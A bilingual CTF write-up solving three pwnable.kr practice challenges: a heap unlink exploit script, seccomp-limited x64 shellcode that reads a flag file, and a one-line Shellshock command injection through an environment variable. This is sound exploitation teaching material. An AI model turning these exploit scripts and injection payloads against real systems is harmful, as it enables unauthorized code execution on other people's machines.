终于结束了考试,刷题模式再次开启T^T
先来一道简单的题目热下身
toddler unlink
description
Daddy! how can I exploit unlink corruption?
ssh unlink@pwnable.kr -p2222 (pw: guest)
what it do
❯ ./unlink
here is stack address leak: 0xffc28534
here is heap address leak: 0x82a0410
now that you have leaks, get shell!
a
Here we have a stack address, a heap address and an input
now the code
int __cdecl main(int argc, const char **argv, const char **envp)
{
int *v3; // ST04_4
char *heap1; // [esp-14h] [ebp-14h]
_DWORD *heap3; // [esp-10h] [ebp-10h]
_DWORD *heap2; // [esp-Ch] [ebp-Ch]
malloc(0x400u);
heap1 = (char *)malloc(0x10u);
heap2 = malloc(0x10u);
heap3 = malloc(0x10u);
*(_DWORD *)heap1 = heap2;
heap2[1] = heap1;
*heap2 = heap3;
heap3[1] = heap2;
printf("here is stack address leak: %p\n", &heap1);
printf("here is heap address leak: %p\n", heap1);
puts("now that you have leaks, get shell!");
gets(heap1 + 8);
unlink((int)heap2, v3);
return 0;
}
_DWORD *__cdecl unlink(int a1, int *a2)
{
_DWORD *v2; // ST10_4
int v3; // ST0C_4
_DWORD *result; // eax
v2 = (_DWORD *)a2[1];
v3 = *a2;
*(_DWORD *)(v3 + 4) = v2;
result = v2;
*v2 = v3;
return result;
}
嘛,这可以算做一个 unlink 的入门练习吧,模仿unlink 的操作
you have three chunk, heap1, which you can overwrite. Heap2, av chunk which will be unlink.
So, 我们的目标就是通过改写 heap2 的 fd以及 bk 来控制执行流
0x804b408: 0x00000000 0x00000019 0x0804b428 0x00000000
0x804b418: 0x00000000 0x00000000 0x00000000 0x00000019
0x804b428: 0x0804b440 0x0804b410 0x00000000 0x00000000
0x804b438: 0x00000000 0x00000019 0x00000000 0x0804b428
0x804b448: 0x00000000 0x00000000 0x00000000 0x00000409
heap1 -- heap2 -- heap3
shell is given
所以所需要做的就是控制执行流跳到 shell 函数即可
pwn step is as below
write(shell_addr*2) in heap1
write( p32(0)+p32(0x19)) overflow heap2 to pervent crash
write(stack_leak+0x10-0x4) to heap2's fd # stack_leak+0x10 is the ebp
write(heap_leak+8+4) to heap2's bk # heap_leak is the addr of heap1
after unlink
main 函数的 esp 会被劫持到 heap_leak+8+4 的地方,也就是我们写入shell_addr 的地方
and after ret operate, you will getshell
exp
from pwn import *
p=process("./unlink")
def pwn():
p.recvuntil("leak: ")
stack_leak=p.recvline().strip()
stack_leak=int(stack_leak,16)
print p.recvuntil("leak: ")
heap_leak=p.recvline().strip()
heap_leak=int(heap_leak,16)
p.info("heap_leak:stack_leak "+hex(heap_leak)+":"+hex(stack_leak))
shell_addr=0x80484EB
payload=p32(shell_addr)*2
payload+=p32(0)+p32(0x19)
payload+=p32(stack_leak+0x10-0x4)
payload+=p32(heap_leak+8+4)
p.sendline(payload)
p.interactive()
pwn()
toddler asm
decription
❯ ./asm ⏎
Welcome to shellcoding practice challenge.
In this challenge, you can run your x64 shellcode under SECCOMP sandbox.
Try to make shellcode that spits flag using open()/read()/write() systemcalls only.
If this does not challenge you. you should play 'asg' challenge :)
give me your x64 shellcode:
this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong
It seems that we need to send a x64 shellcode to read the flag file with the seccomp sandbox
❯ seccomp-tools dump ./asm ⏎
Welcome to shellcoding practice challenge.
In this challenge, you can run your x64 shellcode under SECCOMP sandbox.
Try to make shellcode that spits flag using open()/read()/write() systemcalls only.
If this does not challenge you. you should play 'asg' challenge :)
give me your x64 shellcode: a
line CODE JT JF K
=================================
0000: 0x20 0x00 0x00 0x00000004 A = arch
0001: 0x15 0x00 0x08 0xc000003e if (A != ARCH_X86_64) goto 0010
0002: 0x20 0x00 0x00 0x00000000 A = sys_number
0003: 0x35 0x06 0x00 0x40000000 if (A >= 0x40000000) goto 0010
0004: 0x15 0x04 0x00 0x00000000 if (A == read) goto 0009
0005: 0x15 0x03 0x00 0x00000001 if (A == write) goto 0009
0006: 0x15 0x02 0x00 0x00000002 if (A == open) goto 0009
0007: 0x15 0x01 0x00 0x0000003c if (A == exit) goto 0009
0008: 0x15 0x00 0x01 0x000000e7 if (A != exit_group) goto 0010
0009: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0010: 0x06 0x00 0x00 0x00000000 return KILL
We can only use read, write, and open syscall
and the code
int __cdecl main(int argc, const char **argv, const char **envp)
{
char *s; // ST18_8
size_t v4; // rdx
setvbuf(stdout, 0LL, 2, 0LL);
setvbuf(stdin, 0LL, 1, 0LL);
puts("Welcome to shellcoding practice challenge.");
puts("In this challenge, you can run your x64 shellcode under SECCOMP sandbox.");
puts("Try to make shellcode that spits flag using open()/read()/write() systemcalls only.");
puts("If this does not challenge you. you should play 'asg' challenge :)");
s = (char *)mmap((void *)0x41414000, 0x1000uLL, 7, 50, 0, 0LL);
memset(s, 144, 0x1000uLL);
v4 = strlen(stub);
memcpy(s, stub, v4);
printf("give me your x64 shellcode: ", stub, argv);
read(0, s + 46, 0x3E8uLL);
alarm(0xAu);
chroot("/home/asm_pwn");
sandbox();
((void (__fastcall *)(const char *))s)("/home/asm_pwn");
return 0;
}
Okay, it is clear now.
You know the file name in /home/asm, the real file is in /home/asm_pwn which need to use the binary to reach.
Now, the exp using pwntools
#!/usr/bin/env python
#coding:utf-8
from pwn import *
import time
con = ssh(host='pwnable.kr', user='asm', password='guest', port=2222)
p = con.connect_remote('localhost', 9026)
context.arch='amd64'
shellcode = ''
shellcode += shellcraft.pushstr('this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong')
shellcode += shellcraft.open('rsp', 0, 0)#open the pushed filename
shellcode += shellcraft.read('rax', 'rsp', 100)# rax is the fd return, and then read the flag to the rsp -> stack
shellcode += shellcraft.write(1, 'rsp', 100)# then we write it and now we can see that
print p.recvuntil("shellcode:")
p.send(asm(shellcode))
print p.recv()
print p.recv()
toddler shellsock
description
Mommy, there was a shocking news about bash.
I bet you already know, but lets just make it sure :)
ssh shellshock@pwnable.kr -p2222 (pw:guest)
Well, you need to know the shellshock Vulnerability first.
http://www.freebuf.com/articles/system/45390.html
https://baike.baidu.com/item/Shellshock/15862860?fr=aladdin
You have two file
bash shellshock
shellshock
int __cdecl main(int argc, const char **argv, const char **envp)
{
__gid_t v3; // er12
__gid_t v4; // ebx
__gid_t v5; // eax
__gid_t v6; // er12
__gid_t v7; // ebx
__gid_t v8; // eax
v3 = getegid();
v4 = getegid();
v5 = getegid();
setresuid(v5, v4, v3);
v6 = getegid();
v7 = getegid();
v8 = getegid();
setresgid(v8, v7, v6);
system("/home/shellshock/bash -c 'echo shock_me'");
return 0;
}
shellshock 会调用 bash binary
嘛,总之就是一个命令执行
exp
env x='() { :;}; /bin/cat flag' ./shellshock
memcpy
[培训]《安卓高级研修班(网课)》月薪三万计划,掌
握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法